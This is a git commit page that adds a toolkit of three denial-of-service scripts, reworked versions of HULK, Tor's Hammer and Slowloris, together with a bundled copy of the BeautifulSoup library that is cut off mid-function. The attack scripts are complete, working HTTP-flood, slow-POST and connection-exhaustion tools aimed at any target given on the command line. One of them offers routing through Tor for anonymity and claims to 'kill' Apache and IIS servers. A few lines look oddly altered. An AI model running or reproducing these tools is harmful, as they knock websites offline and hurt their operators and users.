author     N3V0N <navanchauhan@gmail.com>  2017-07-22 14:19:57 +0530
committer  GitHub <noreply@github.com>     2017-07-22 14:19:57 +0530
commit     14d526c1f70a42fb0daab22fd76b2c16d1bcc4ad (patch)
tree       787926bc961ed9d2f51017116b7ef2ea80287132
parent     5fa27bdc28e6cf05e9ef413d0f9e77c111e16a18 (diff)
the code
-rw-r--r--  src/1.py               153
-rw-r--r--  src/2.py               188
-rw-r--r--  src/3.pl               364
-rw-r--r--  src/BeautifulSoup.py   2000
-rw-r--r--  src/BeautifulSoup.pyc  bin 0 -> 68629 bytes
-rw-r--r--  src/bahubali           99
-rw-r--r--  src/socks.py           387
-rw-r--r--  src/socks.pyc          bin 0 -> 15317 bytes
-rw-r--r--  src/terminal.py        185
-rw-r--r--  src/terminal.pyc       bin 0 -> 6885 bytes
10 files changed, 3376 insertions, 0 deletions
diff --git a/src/1.py b/src/1.py
new file mode 100644
index 0000000..b5cb921
--- /dev/null
+++ b/src/1.py
@@ -0,0 +1,153 @@
+# ----------------------------------------------------------------------------------------------
+# Bahubali Tool No 1
+#
+# Based on HULK by Barry Shteiman
+#
+# By: N3V0N
+# ----------------------------------------------------------------------------------------------
+import urllib2
+import sys
+import threading
+import random
+import re
+
+#global params
+url=''
+host=''
+headers_useragents=[]
+headers_referers=[]
+request_counter=0
+flag=0
+safe=0
+
+def inc_counter():
+ global request_counter
+ request_counter+=1
+
+def set_flag(val):
+ global flag
+ flag=val
+
+def set_safe():
+ global safe
+ safe=1
+
+# generates a user agent array
+def useragent_list():
+ global headers_useragents
+ headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
+ headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
+ return(headers_useragents)
+
+# generates a referer array
+def referer_list():
+ global headers_referers
+ headers_referers.append('http://www.google.com/?q=')
+ headers_referers.append('http://www.usatoday.com/search/results?q=')
+ headers_referers.append('http://engadget.search.aol.com/search?q=')
+ headers_referers.append('http://' + host + '/')
+ return(headers_referers)
+
+#builds random ascii string
+def buildblock(size):
+ out_str = ''
+ for i in range(0, size):
+ a = random.randint(65, 90)
+ out_str += chr(a)
+ return(out_str)
+
+def usage():
+ print '---------------------------------------------------'
+ print 'USAGE: python 1.py <url>'
+ print 'you can add "safe" after the url to auto-shut down once the server starts returning errors'
+ print '---------------------------------------------------'
+
+
+#http request
+def httpcall(url):
+ useragent_list()
+ referer_list()
+ code=0
+ if url.count("?")>0:
+ param_joiner="&"
+ else:
+ param_joiner="?"
+ request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
+ request.add_header('User-Agent', random.choice(headers_useragents))
+ request.add_header('Cache-Control', 'no-cache')
+ request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
+ request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
+ request.add_header('Keep-Alive', random.randint(110,120))
+ request.add_header('Connection', 'keep-alive')
+ request.add_header('Host',host)
+ try:
+ urllib2.urlopen(request)
+ except urllib2.HTTPError, e:
+ #print e.code
+ set_flag(1)
+  print 'Response Code %d' % e.code
+ code=500
+ except urllib2.URLError, e:
+ #print e.reason
+ sys.exit()
+ else:
+ inc_counter()
+  urllib2.urlopen(request) # fires the same request a second time on success
+ return(code)
+
+
+#http caller thread
+class HTTPThread(threading.Thread):
+ def run(self):
+ try:
+ while flag<2:
+ code=httpcall(url)
+ if (code==500) & (safe==1):
+ set_flag(2)
+ except Exception, ex:
+ pass
+
+# monitors http threads and counts requests
+class MonitorThread(threading.Thread):
+ def run(self):
+ previous=request_counter
+ while flag==0:
+   if (previous+100<request_counter) & (previous!=request_counter):
+ print "%d Requests Sent" % (request_counter)
+ previous=request_counter
+ if flag==2:
+ print "\n-- Attack Finished --"
+
+#execute
+if len(sys.argv) < 2:
+ usage()
+ sys.exit()
+else:
+ if sys.argv[1]=="help":
+ usage()
+ sys.exit()
+ else:
+ print "-- Attack Initiated --"
+ if len(sys.argv)== 3:
+ if sys.argv[2]=="safe":
+ set_safe()
+ url = sys.argv[1]
+ if url.count("/")==2:
+ url = url + "/"
+ m = re.search('http\://([^/]*)/?.*', url)
+ host = m.group(1)
+ for i in range(500):
+ t = HTTPThread()
+ t.start()
+ t = MonitorThread()
+ t.start()
diff --git a/src/2.py b/src/2.py
new file mode 100644
index 0000000..eadcd39
--- /dev/null
+++ b/src/2.py
@@ -0,0 +1,188 @@
+#!/usr/bin/python
+
+"""
+Bahubali Tool 2 - Slow POST Denial Of Service Testing Tool
+Version 0.9
+Based on Tor's Hammer
+
+Tool No 2 is a slow POST DoS testing tool written in Python.
+It can run through the Tor network to be anonymized.
+Kills most unprotected web servers running Apache and IIS via a single instance.
+Kills Apache 1.X and older IIS with ~128 threads.
+Kills newer IIS and Apache 2.X with ~256 threads.
+"""
+
+import os
+import re
+import time
+import sys
+import random
+import math
+import getopt
+import socks
+import string
+import terminal
+
+from threading import Thread
+
+global stop_now
+global term
+
+stop_now = False
+term = terminal.TerminalController()
+
+useragents = [
+ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
+ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
+ "Googlebot/2.1 (http://www.googlebot.com/bot.html)",
+ "Opera/9.20 (Windows NT 6.0; U; en)",
+ "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
+ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
+ "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
+ "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
+ "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not
+ "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13",
+ "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
+ "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
+ "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
+ "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
+ "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
+ "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
+ "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
+ "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
+ "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
+ "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)"
+]
+
+class httpPost(Thread):
+ def __init__(self, host, port, tor):
+ Thread.__init__(self)
+ self.host = host
+ self.port = port
+ self.socks = socks.socksocket()
+ self.tor = tor
+ self.running = True
+
+ def _send_http_post(self, pause=10):
+ global stop_now
+
+ self.socks.send("POST / HTTP/1.1\r\n"
+ "Host: %s\r\n"
+ "User-Agent: %s\r\n"
+ "Connection: keep-alive\r\n"
+ "Keep-Alive: 900\r\n"
+ "Content-Length: 10000\r\n"
+ "Content-Type: application/x-www-form-urlencoded\r\n\r\n" %
+ (self.host, random.choice(useragents)))
+
+ for i in range(0, 9999):
+ if stop_now:
+ self.running = False
+ break
+ p = random.choice(string.letters+string.digits)
+ print term.BOL+term.UP+term.CLEAR_EOL+"Posting: %s" % p+term.NORMAL
+ self.socks.send(p)
+ time.sleep(random.uniform(0.1, 3))
+
+ self.socks.close()
+
+ def run(self):
+ while self.running:
+ while self.running:
+ try:
+ if self.tor:
+ self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
+ self.socks.connect((self.host, self.port))
+ print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL
+ break
+ except Exception, e:
+ if e.args[0] == 106 or e.args[0] == 60:
+ break
+ print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL
+ time.sleep(1)
+ continue
+
+ while self.running:
+ try:
+ self._send_http_post()
+ except Exception, e:
+ if e.args[0] == 32 or e.args[0] == 104:
+ print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL
+ self.socks = socks.socksocket()
+ break
+ time.sleep(0.1)
+ pass
+
+def usage():
+ print "./1.py -t <target> [-r <threads> -p <port> -T -h]"
+ print " -t|--target <Hostname|IP>"
+ print " -r|--threads <Number of threads> Defaults to 256"
+ print " -p|--port <Web Server Port> Defaults to 80"
+ print " -h|--help Shows this help\n"
+
+def main(argv):
+
+ try:
+ opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="])
+ except getopt.GetoptError:
+ usage()
+ sys.exit(-1)
+
+ global stop_now
+
+ target = ''
+ threads = 256
+ tor = False
+ port = 80
+
+ for o, a in opts:
+ if o in ("-h", "--help"):
+ usage()
+ sys.exit(0)
+ if o in ("-T", "--tor"):
+ tor = True
+ elif o in ("-t", "--target"):
+ target = a
+ elif o in ("-r", "--threads"):
+ threads = int(a)
+ elif o in ("-p", "--port"):
+ port = int(a)
+
+ if target == '' or int(threads) <= 0:
+ usage()
+ sys.exit(-1)
+
+ print term.DOWN + term.RED + "/*" + term.NORMAL
+ print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL
+ print term.RED + " * Threads: %d Tor: %s" % (threads, tor) + term.NORMAL
+ print term.RED + " * Give 20 seconds without tor or 40 with before checking site" + term.NORMAL
+ print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL
+
+ rthreads = []
+ for i in range(threads):
+ t = httpPost(target, port, tor)
+ rthreads.append(t)
+ t.start()
+
+    while len(rthreads) > 0:
+        try:
+            # join() returns None, so keep the Thread objects themselves
+            for t in rthreads:
+                t.join(1)
+            rthreads = [t for t in rthreads if t.isAlive()]
+        except KeyboardInterrupt:
+            print "\nShutting down threads...\n"
+            stop_now = True
+            for t in rthreads:
+                t.running = False
+
+if __name__ == "__main__":
+ print "\n/*"
+ print " *"+term.RED + " Bahubali Tool 2 "+term.NORMAL
+ print " * Slow POST DoS Testing Tool"
+ print " * Version 0.9"
+ print " * Anonymized via Tor"
+ print " */\n"
+
+ main(sys.argv[1:])
+
diff --git a/src/3.pl b/src/3.pl
new file mode 100644
index 0000000..289a713
--- /dev/null
+++ b/src/3.pl
@@ -0,0 +1,364 @@
+#!/usr/bin/perl -w
+use strict;
+use IO::Socket::INET;
+use IO::Socket::SSL;
+use Getopt::Long;
+use Config;
+
+$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
+
+print <<EOTEXT;
+Welcome to Bahubali Tool No 3, Based on Slowloris by Laera Loris
+EOTEXT
+
+my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
+my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
+my $result = GetOptions(
+ 'shost=s' => \$shost,
+ 'dns=s' => \$host,
+ 'httpready' => \$httpready,
+ 'num=i' => \$connections,
+ 'cache' => \$cache,
+ 'port=i' => \$port,
+ 'https' => \$ssl,
+ 'tcpto=i' => \$tcpto,
+ 'test' => \$test,
+ 'timeout=i' => \$timeout,
+ 'version' => \$version,
+);
+
+if ($version) {
+ print "Version 0.9\n";
+ exit;
+}
+
+unless ($host) {
+ print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
+ print "\n\tType 'perldoc $0' for help with options.\n\n";
+ exit;
+}
+
+unless ($port) {
+ $port = 80;
+ print "Defaulting to port 80.\n";
+}
+
+unless ($tcpto) {
+ $tcpto = 5;
+ print "Defaulting to a 5 second tcp connection timeout.\n";
+}
+
+unless ($test) {
+ unless ($timeout) {
+ $timeout = 100;
+ print "Defaulting to a 100 second re-try timeout.\n";
+ }
+ unless ($connections) {
+ $connections = 1000;
+ print "Defaulting to 1000 connections.\n";
+ }
+}
+
+my $usemultithreading = 0;
+if ( $Config{usethreads} ) {
+ print "Multithreading enabled.\n";
+ $usemultithreading = 1;
+ use threads;
+ use threads::shared;
+}
+else {
+ print "No multithreading capabilites found!\n";
+ print "The tool will be slower than normal as a result.\n";
+}
+
+my $packetcount : shared = 0;
+my $failed : shared = 0;
+my $connectioncount : shared = 0;
+
+srand() if ($cache);
+
+if ($shost) {
+ $sendhost = $shost;
+}
+else {
+ $sendhost = $host;
+}
+if ($httpready) {
+ $method = "POST";
+}
+else {
+ $method = "GET";
+}
+
+if ($test) {
+ my @times = ( "2", "30", "90", "240", "500" );
+ my $totaltime = 0;
+ foreach (@times) {
+ $totaltime = $totaltime + $_;
+ }
+ $totaltime = $totaltime / 60;
+ print "Thie test could take up to $totaltime minutes.\n";
+
+ my $delay = 0;
+ my $working = 0;
+ my $sock;
+
+ if ($ssl) {
+ if (
+ $sock = new IO::Socket::SSL(
+ PeerAddr => "$host",
+ PeerPort => "$port",
+ Timeout => "$tcpto",
+ Proto => "tcp",
+ )
+ )
+ {
+ $working = 1;
+ }
+ }
+ else {
+ if (
+ $sock = new IO::Socket::INET(
+ PeerAddr => "$host",
+ PeerPort => "$port",
+ Timeout => "$tcpto",
+ Proto => "tcp",
+ )
+ )
+ {
+ $working = 1;
+ }
+ }
+ if ($working) {
+ if ($cache) {
+ $rand = "?" . int( rand(99999999999999) );
+ }
+ else {
+ $rand = "";
+ }
+ my $primarypayload =
+ "GET /$rand HTTP/1.1\r\n"
+ . "Host: $sendhost\r\n"
+ . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
+ . "Content-Length: 42\r\n";
+ if ( print $sock $primarypayload ) {
+ print "Connection successful, now comes the waiting game...\n";
+ }
+ else {
+ print
+"That's odd - I connected but couldn't send the data to $host:$port.\n";
+ print "Is something wrong?\nDying.\n";
+ exit;
+ }
+ }
+ else {
+ print "Can't connect to $host:$port.\n";
+ print "Is something wrong?\nDying.\n";
+ exit;
+ }
+ for ( my $i = 0 ; $i <= $#times ; $i++ ) {
+ print "Trying a $times[$i] second delay: \n";
+ sleep( $times[$i] );
+ if ( print $sock "X-a: b\r\n" ) {
+ print "\tWorked.\n";
+ $delay = $times[$i];
+ }
+ else {
+ if ( $SIG{__WARN__} ) {
+ $delay = $times[ $i - 1 ];
+ last;
+ }
+ print "\tFailed after $times[$i] seconds.\n";
+ }
+ }
+
+ if ( print $sock "Connection: Close\r\n\r\n" ) {
+ print "Okay that's enough time. Slowloris closed the socket.\n";
+ print "Use $delay seconds for -timeout.\n";
+ exit;
+ }
+ else {
+ print "Remote server closed socket.\n";
+ print "Use $delay seconds for -timeout.\n";
+ exit;
+ }
+ if ( $delay < 166 ) {
+ print <<EOSUCKS2BU;
+Since the timeout ended up being so small ($delay seconds) and it generally
+takes between 200-500 threads for most servers and assuming any latency at
+all... you might have trouble using Slowloris against this target. You can
+tweak the -timeout flag down to less than 10 seconds but it still may not
+build the sockets in time.
+EOSUCKS2BU
+ }
+}
+else {
+ print
+"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
+
+ if ($usemultithreading) {
+ domultithreading($connections);
+ }
+ else {
+ doconnections( $connections, $usemultithreading );
+ }
+}
+
+sub doconnections {
+ my ( $num, $usemultithreading ) = @_;
+ my ( @first, @sock, @working );
+ my $failedconnections = 0;
+ $working[$_] = 0 foreach ( 1 .. $num ); #initializing
+ $first[$_] = 0 foreach ( 1 .. $num ); #initializing
+ while (1) {
+ $failedconnections = 0;
+ print "\t\tBuilding sockets.\n";
+ foreach my $z ( 1 .. $num ) {
+ if ( $working[$z] == 0 ) {
+ if ($ssl) {
+ if (
+ $sock[$z] = new IO::Socket::SSL(
+ PeerAddr => "$host",
+ PeerPort => "$port",
+ Timeout => "$tcpto",
+ Proto => "tcp",
+ )
+ )
+ {
+ $working[$z] = 1;
+ }
+ else {
+ $working[$z] = 0;
+ }
+ }
+ else {
+ if (
+ $sock[$z] = new IO::Socket::INET(
+ PeerAddr => "$host",
+ PeerPort => "$port",
+ Timeout => "$tcpto",
+ Proto => "tcp",
+ )
+ )
+ {
+ $working[$z] = 1;
+ $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
+ }
+ else {
+ $working[$z] = 0;
+ }
+ }
+ if ( $working[$z] == 1 ) {
+ if ($cache) {
+ $rand = "?" . int( rand(99999999999999) );
+ }
+ else {
+ $rand = "";
+ }
+ my $primarypayload =
+ "$method /$rand HTTP/1.1\r\n"
+ . "Host: $sendhost\r\n"
+ . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
+ . "Content-Length: 42\r\n";
+ my $handle = $sock[$z];
+ if ($handle) {
+ print $handle "$primarypayload";
+ if ( $SIG{__WARN__} ) {
+ $working[$z] = 0;
+ close $handle;
+ $failed++;
+ $failedconnections++;
+ }
+ else {
+ $packetcount++;
+ $working[$z] = 1;
+ }
+ }
+ else {
+ $working[$z] = 0;
+ $failed++;
+ $failedconnections++;
+ }
+ }
+ else {
+ $working[$z] = 0;
+ $failed++;
+ $failedconnections++;
+ }
+ }
+ }
+ print "\t\tSending data.\n";
+ foreach my $z ( 1 .. $num ) {
+ if ( $working[$z] == 1 ) {
+ if ( $sock[$z] ) {
+ my $handle = $sock[$z];
+ if ( print $handle "X-a: b\r\n" ) {
+ $working[$z] = 1;
+ $packetcount++;
+ }
+ else {
+ $working[$z] = 0;
+ #debugging info
+ $failed++;
+ $failedconnections++;
+ }
+ }
+ else {
+ $working[$z] = 0;
+ #debugging info
+ $failed++;
+ $failedconnections++;
+ }
+ }
+ }
+ print
+"Current stats:\tThe tool has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
+ sleep($timeout);
+ }
+}
+
+sub domultithreading {
+ my ($num) = @_;
+ my @thrs;
+ my $i = 0;
+ my $connectionsperthread = 50;
+ while ( $i < $num ) {
+ $thrs[$i] =
+ threads->create( \&doconnections, $connectionsperthread, 1 );
+ $i += $connectionsperthread;
+ }
+ my @threadslist = threads->list();
+    # Keep the main thread alive while the workers run, continually
+    # resetting the shared failure counter.
+    while ( $#threadslist > 0 ) {
+        $failed = 0;
+    }
+}
+
+__END__
+
+=head1 TITLE
+
+Bahubali Tool 3 by N3V0N
+
+=head1 VERSION
+
+Version 0.9 Stable
+
+=head1 DATE
+
+22/07/17
+
+=head1 AUTHOR
+
+Navan Chauhan <navanchauhan@gmail.com>
+
+=head1 ABSTRACT
+
+Based on Slowloris
+
+=head1 AFFECTS
+
+Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
+
+=head1 NOT AFFECTED
+
+IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
diff --git a/src/BeautifulSoup.py b/src/BeautifulSoup.py
new file mode 100644
index 0000000..34204e7
--- /dev/null
+++ b/src/BeautifulSoup.py
@@ -0,0 +1,2000 @@
+"""Beautiful Soup
+Elixir and Tonic
+"The Screen-Scraper's Friend"
+http://www.crummy.com/software/BeautifulSoup/
+
+Beautiful Soup parses a (possibly invalid) XML or HTML document into a
+tree representation. It provides methods and Pythonic idioms that make
+it easy to navigate, search, and modify the tree.
+
+A well-formed XML/HTML document yields a well-formed data
+structure. An ill-formed XML/HTML document yields a correspondingly
+ill-formed data structure. If your document is only locally
+well-formed, you can use this library to find and process the
+well-formed part of it.
+
+Beautiful Soup works with Python 2.2 and up. It has no external
+dependencies, but you'll have more success at converting data to UTF-8
+if you also install these three packages:
+
+* chardet, for auto-detecting character encodings
+ http://chardet.feedparser.org/
+* cjkcodecs and iconv_codec, which add more encodings to the ones supported
+ by stock Python.
+ http://cjkpython.i18n.org/
+
+Beautiful Soup defines classes for two main parsing strategies:
+
+ * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
+ language that kind of looks like XML.
+
+ * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
+ or invalid. This class has web browser-like heuristics for
+ obtaining a sensible parse tree in the face of common HTML errors.
+
+Beautiful Soup also defines a class (UnicodeDammit) for autodetecting
+the encoding of an HTML or XML document, and converting it to
+Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.
+
+For more than you ever wanted to know about Beautiful Soup, see the
+documentation:
+http://www.crummy.com/software/BeautifulSoup/documentation.html
+
+Here, have some legalese:
+
+Copyright (c) 2004-2009, Leonard Richardson
+
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+ * Redistributions of source code must retain the above copyright
+ notice, this list of conditions and the following disclaimer.
+
+ * Redistributions in binary form must reproduce the above
+ copyright notice, this list of conditions and the following
+ disclaimer in the documentation and/or other materials provided
+ with the distribution.
+
+ * Neither the name of the the Beautiful Soup Consortium and All
+ Night Kosher Bakery nor the names of its contributors may be
+ used to endorse or promote products derived from this software
+ without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
+CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT.
+
+"""
+from __future__ import generators
+
+__author__ = "Leonard Richardson (leonardr@segfault.org)"
+__version__ = "3.1.0.1"
+__copyright__ = "Copyright (c) 2004-2009 Leonard Richardson"
+__license__ = "New-style BSD"
+
+import codecs
+import markupbase
+import types
+import re
+from HTMLParser import HTMLParser, HTMLParseError
+try:
+ from htmlentitydefs import name2codepoint
+except ImportError:
+ name2codepoint = {}
+try:
+ set
+except NameError:
+ from sets import Set as set
+
+#These hacks make Beautiful Soup able to parse XML with namespaces
+markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match
+
+DEFAULT_OUTPUT_ENCODING = "utf-8"
+
+# First, the classes that represent markup elements.
+
+def sob(unicode, encoding):
+ """Returns either the given Unicode string or its encoding."""
+ if encoding is None:
+ return unicode
+ else:
+ return unicode.encode(encoding)
+
+class PageElement:
+ """Contains the navigational information for some part of the page
+ (either a tag or a piece of text)"""
+
+ def setup(self, parent=None, previous=None):
+ """Sets up the initial relations between this element and
+ other elements."""
+ self.parent = parent
+ self.previous = previous
+ self.next = None
+ self.previousSibling = None
+ self.nextSibling = None
+ if self.parent and self.parent.contents:
+ self.previousSibling = self.parent.contents[-1]
+ self.previousSibling.nextSibling = self
+
+ def replaceWith(self, replaceWith):
+ oldParent = self.parent
+ myIndex = self.parent.contents.index(self)
+ if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent:
+ # We're replacing this element with one of its siblings.
+ index = self.parent.contents.index(replaceWith)
+ if index and index < myIndex:
+ # Furthermore, it comes before this element. That
+ # means that when we extract it, the index of this
+ # element will change.
+ myIndex = myIndex - 1
+ self.extract()
+ oldParent.insert(myIndex, replaceWith)
+
+ def extract(self):
+ """Destructively rips this element out of the tree."""
+ if self.parent:
+ try:
+ self.parent.contents.remove(self)
+ except ValueError:
+ pass
+
+ #Find the two elements that would be next to each other if
+ #this element (and any children) hadn't been parsed. Connect
+ #the two.
+ lastChild = self._lastRecursiveChild()
+ nextElement = lastChild.next
+
+ if self.previous:
+ self.previous.next = nextElement
+ if nextElement:
+ nextElement.previous = self.previous
+ self.previous = None
+ lastChild.next = None
+
+ self.parent = None
+ if self.previousSibling:
+ self.previousSibling.nextSibling = self.nextSibling
+ if self.nextSibling:
+ self.nextSibling.previousSibling = self.previousSibling
+ self.previousSibling = self.nextSibling = None
+ return self
+
+ def _lastRecursiveChild(self):
+ "Finds the last element beneath this object to be parsed."
+ lastChild = self
+ while hasattr(lastChild, 'contents') and lastChild.contents:
+ lastChild = lastChild.contents[-1]
+ return lastChild
+
+ def insert(self, position, newChild):
+ if (isinstance(newChild, basestring)
+ or isinstance(newChild, unicode)) \
+ and not isinstance(newChild, NavigableString):
+ newChild = NavigableString(newChild)
+
+ position = min(position, len(self.contents))
+ if hasattr(newChild, 'parent') and newChild.parent != None:
+ # We're 'inserting' an element that's already one
+ # of this object's children.
+ if newChild.parent == self:
+ index = self.find(newChild)
+ if index and index < position:
+ # Furthermore we're moving it further down the
+ # list of this object's children. That means that
+ # when we extract this element, our target index
+ # will jump down one.
+ position = position - 1
+ newChild.extract()
+
+ newChild.parent = self
+ previousChild = None
+ if position == 0:
+ newChild.previousSibling = None
+ newChild.previous = self
+ else:
+ previousChild = self.contents[position-1]
+ newChild.previousSibling = previousChild
+ newChild.previousSibling.nextSibling = newChild
+ newChild.previous = previousChild._lastRecursiveChild()
+ if newChild.previous:
+ newChild.previous.next = newChild
+
+ newChildsLastElement = newChild._lastRecursiveChild()
+
+ if position >= len(self.contents):
+ newChild.nextSibling = None
+
+ parent = self
+ parentsNextSibling = None
+ while not parentsNextSibling:
+ parentsNextSibling = parent.nextSibling
+ parent = parent.parent
+ if not parent: # This is the last element in the document.
+ break
+ if parentsNextSibling:
+ newChildsLastElement.next = parentsNextSibling
+ else:
+ newChildsLastElement.next = None
+ else:
+ nextChild = self.contents[position]
+ newChild.nextSibling = nextChild
+ if newChild.nextSibling:
+ newChild.nextSibling.previousSibling = newChild
+ newChildsLastElement.next = nextChild
+
+ if newChildsLastElement.next:
+ newChildsLastElement.next.previous = newChildsLastElement
+ self.contents.insert(position, newChild)
+
+ def append(self, tag):
+ """Appends the given tag to the contents of this tag."""
+ self.insert(len(self.contents), tag)
+
+ def findNext(self, name=None, attrs={}, text=None, **kwargs):
+ """Returns the first item that matches the given criteria and
+ appears after this Tag in the document."""
+ return self._findOne(self.findAllNext, name, attrs, text, **kwargs)
+
+ def findAllNext(self, name=None, attrs={}, text=None, limit=None,
+ **kwargs):
+ """Returns all items that match the given criteria and appear
+ after this Tag in the document."""
+ return self._findAll(name, attrs, text, limit, self.nextGenerator,
+ **kwargs)
+
+ def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):
+ """Returns the closest sibling to this Tag that matches the
+ given criteria and appears after this Tag in the document."""
+ return self._findOne(self.findNextSiblings, name, attrs, text,
+ **kwargs)
+
+ def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,
+ **kwargs):
+ """Returns the siblings of this Tag that match the given
+ criteria and appear after this Tag in the document."""
+ return self._findAll(name, attrs, text, limit,
